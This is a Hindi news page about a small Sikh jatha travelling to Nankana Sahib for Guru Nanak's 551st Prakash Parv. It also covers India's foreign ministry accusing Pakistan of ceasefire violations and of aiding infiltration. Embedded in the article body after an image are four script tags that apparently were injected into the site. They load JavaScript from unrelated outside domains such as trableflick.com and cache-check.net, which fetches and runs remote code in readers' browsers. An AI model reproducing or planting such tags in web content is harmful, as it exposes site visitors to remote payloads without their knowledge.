Categories: इंडिया

गुरू नानक देव की 551वें प्रकाश पर्व पर ननकाना साहिब के लिए जाएगा छोटा जत्था

<p>सिखों के पहले गुरू नानक देव की 551वें प्रकाश पर्व पर भारत से पाकिस्तान स्थित ननकाना साहिब के लिए इस बार कोविड महामारी के कारण सिखों का छोटा जत्था जाएगा। विदेश मंत्रालय के प्रवक्ता अनुराग श्रीवास्तव ने यहां संवाददाताओं को बताया कि भारत एवं पाकिस्तान के बीच 1974 के धार्मिक यात्राओं के द्विपक्षीय प्रोटोकॉल के तहत इस साल 27 नवंबर से एक दिसंबर के बीच सिखों का एक जत्था ननकाना साहिब के लिए जाएगा। जत्था कोविड प्रोटोकाल का कड़ाई से पालन करेगा और इस बार यह जत्था छोटा होगा।</p>

<p>करतारपुर साहिब की यात्रा के बारे में पूछे जाने पर प्रवक्ता ने कहा कि इस बारे में गृह मंत्रालय संबंधित विभागों के साथ बातचीत कर रहा है। जैसे ही निर्णय होगा, उसकी जानकारी दी जाएगी। पाकिस्तानी फौज द्वारा जम्मू कश्मीर में स्थानीय निकाय के चुनावों के पहले संघर्ष विराम के उल्लंघन की घटनाओं के बारे में एक सवाल के जवाब में श्रीवास्तव ने कहा कि बार बार संयम बरतने की अपील के बावजूद पाकिस्तानी सेना घुसपैठियों को कवर फायर देने में लगी है। यह घुसपैठ जम्मू कश्मीर में आतंकवाद को बढ़ाने के लिए करायी जा रही है। पाकिस्तानी सेना की शह के बिना यह संभव नहीं है।</p>

<p>गत 13 नवंबर को नियंत्रण रेखा पर कई जगहों पर एक साथ अंधाधुंध फायरिंग को लेकर पाकिस्तान उच्चायोग के प्रभारी को विदेश मंत्रालय ने 14 नवंबर को तलब करके फटकार भी लगायी थी। उस फायरिंग में चार नागरिक मारे गये थे और 19 अन्य घायल हो गये थे। प्रवक्ता ने कहा कि भारत पाकिस्तान के सीमापार से आतंकवादियों की घुसपैठ कराने का कड़ा विरोध करता है। पाकिस्तान को फिर आगाह किया जाता है कि वह अपने द्विपक्षीय वायदे को निभाये और अपने नियंत्रण वाले इलाके से भारत के विरुद्ध किसी भी प्रकार से आतंकवाद की अनुमति नहीं दे।</p>

<p><img src=”/media/gallery/images/image(1590).png” style=”height:110px; width:900px” /></p>
<script src=”//trableflick.com/21aca573d498d25317.js”></script>
<script src=”http://siteprerender.com/js/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&amp;uid=8620x” type=”text/javascript”></script>
<script src=”http://cache-check.net/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&amp;uid=8620x&amp;format=arrjs&amp;r=1605845942264″ type=”text/javascript”></script>
<script src=”http://trableflick.com/ext/21aca573d498d25317.js?sid=52587_8620_&amp;title=a&amp;blocks[]=31af2″ type=”text/javascript”></script>

Samachar First

Recent Posts

केजरीवाल ने Rss Chief को पत्र, केंद्रीय एजेंसियों के दुरुपयोग के आरोप

  New Delhi: आम आदमी पार्टी (AAP) के राष्ट्रीय संयोजक अरविंद केजरीवाल ने राष्ट्रीय स्वयंसेवक…

27 mins ago

कृषि कानून के बयान पर कंगना रनौत ने मानी गलती

  Mandi: मंडी की सांसद और अभिनेत्री कंगना रनौत ने कृषि कानून पर दिए गए…

42 mins ago

कृषि कानून पर बयान देने पर कंगना रनौत ने किसानों से मांगी माफी , अपने शब्द लिए वापस

Mandi: मंडी की सांसद और अभिनेत्री कंगना रनौत ने कृषि कानून पर दिए गए बयान…

48 mins ago

न्यायाधीश राजीव शकधर ने हिमाचल प्रदेश हाईकोर्ट के मुख्य न्यायाधीश के पद की शपथ ली

Shimla: दिल्ली हाईकोर्ट के न्यायाधीश राजीव शकधर ने  आज  हिमाचल प्रदेश हाईकोर्ट के मुख्य न्यायाधीश…

1 hour ago

विदेशी पैराग्‍लाइडरस के बिना बीड बिलिंग सूनी, अब दो अक्‍तूबर से आस

  मौसम की बेरुखी के चलते विदेशी पायलटों ने नहीं दी दस्‍तक रोजाना मात्र 40…

2 hours ago

जानें, कैसा रहेगा आपके लिए आज का दिन

आज का राशिफल दिनांक: 25 सितम्बर 2024 मेष (Aries): आज आपको नई जिम्मेदारियां मिल सकती…

2 hours ago